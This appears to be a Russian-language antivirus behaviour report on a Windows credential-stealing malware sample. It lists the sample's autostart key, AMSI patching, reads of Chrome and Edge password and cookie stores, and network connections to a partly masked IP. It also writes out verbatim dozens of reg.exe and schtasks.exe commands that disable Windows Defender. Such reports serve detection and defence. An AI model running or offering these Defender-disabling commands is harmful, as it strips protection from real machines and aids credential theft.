Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Taje' = '%ALLUSERSPROFILE%\Qiqu\Taje.exe'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
Патчит код
в динамической библиотеке
- Процесс idda.exe, модуль KERNEL32.dll
- Процесс taje.exe, модуль KERNEL32.dll
в динамической библиотеке AMSI
- Процесс idda.exe, модуль Amsi.dll
- Процесс taje.exe, модуль Amsi.dll
Читает файлы, отвечающие за хранение паролей сторонними программами
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %LOCALAPPDATA%\microsoft\edge\user data\default\login data
- %LOCALAPPDATA%\microsoft\edge\user data\default\web data
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\qiqu\taje.exe
- %ALLUSERSPROFILE%\dodic\hayova
- %TEMP%\a0fc-98dd-9278-4632.tmp
- %ALLUSERSPROFILE%\dodic\tagigumo\4828484f76350c514e292be2cdb800a5f48e8da1
- %ALLUSERSPROFILE%\dodic\tagigumo\9092c4eed48dae23ecaebee86cad6acfdb57c285
- %HOMEPATH%\zafbra\6ivivz\1.bat
- %TEMP%\4c85-94cb-aed7-b870.tmp
- %TEMP%\53d5-6f85-caf4-13c6\login data
- %TEMP%\d4b7-c84c-75ea-e188\web data
- %TEMP%\wmx86ot\csfq30\default\hcf4e
- %TEMP%\wmx86ot\csfq30\default\hragiazzf\login data
- %TEMP%\wmx86ot\csfq30\default\hragiazzf\web data
- %TEMP%\1be0-b2f9-9d34-8d43\cookies
- %TEMP%\wmx86ot\csfq30\default\zrbin6np40\cookies
- %TEMP%\2c59-8628-a7ca-bd6d\login data
- %TEMP%\9be1-e2da-77a5-5338\web data
- %TEMP%\wmx86ot\r5ryrxeo0\default\hcf4e
- %TEMP%\wmx86ot\r5ryrxeo0\default\hragiazzf\login data
- %TEMP%\wmx86ot\r5ryrxeo0\default\hragiazzf\web data
- %TEMP%\c892-5333-f162-a915.tmp
- %TEMP%\1642-ad10-273e-98b2.tmp
- %TEMP%\d07c-4df1-1c22-f13d.tmp
- %TEMP%\wmx86ot\rhkl33e1\dnyauhh1.default-release\hragiazzf
- %TEMP%\wmx86ot\rhkl33e1\dnyauhh1.default-release\zrbin6np40
- %TEMP%\wmx86ot\guhsvyo.json
- %TEMP%\gchv5.7z
- %TEMP%\1906-647f-16f8-af76.tmp
- %ALLUSERSPROFILE%\dodic\sujafo
- %ALLUSERSPROFILE%\dodic\leliluku
Удаляет файлы, которые сам же создал
- %TEMP%\53d5-6f85-caf4-13c6\login data
- %TEMP%\d4b7-c84c-75ea-e188\web data
- %TEMP%\1be0-b2f9-9d34-8d43\cookies
- %TEMP%\2c59-8628-a7ca-bd6d\login data
- %TEMP%\9be1-e2da-77a5-5338\web data
- %TEMP%\c892-5333-f162-a915.tmp
- %TEMP%\1642-ad10-273e-98b2.tmp
- %TEMP%\d07c-4df1-1c22-f13d.tmp
- %TEMP%\1906-647f-16f8-af76.tmp
Сетевая активность
Подключается к
- '15#.#4.208.34':3333
- '15#.#4.208.34':3334
TCP
Другие
- '15#.#4.208.34':3333
- '15#.#4.208.34':3334
Другое
Создает и запускает на исполнение
- '%ALLUSERSPROFILE%\qiqu\taje.exe'
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c "%HOMEPATH%\ZAFBRa\6IvIVz\1.bat"
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableLocalAdminMerge" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRawWriteNotification" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "LocalSettingOverrideDisableBehaviorMonitoring" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "LocalSettingOverrideDisableIntrusionPreventionSystem" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "LocalSettingOverrideDisableIOAVProtection" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "LocalSettingOverrideDisableOnAccessProtection" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "LocalSettingOverrideDisableRealtimeMonitoring" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "LocalSettingOverrideRealtimeScanDirection" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
